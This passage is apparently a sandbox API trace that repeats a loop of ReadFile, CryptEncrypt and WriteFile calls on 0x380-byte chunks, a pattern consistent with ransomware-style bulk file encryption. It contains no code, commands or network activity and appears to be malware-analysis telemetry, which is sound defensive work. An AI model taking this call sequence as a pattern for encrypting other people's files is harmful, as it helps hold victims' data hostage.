[0278.982] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.982] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.983] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.983] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.983] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.983] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.983] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.983] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.984] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.984] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.984] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.984] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.984] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.984] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.984] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.985] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.985] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.985] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.985] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.985] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.986] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.986] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.987] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.987] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.988] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.988] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.989] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.989] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.989] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, 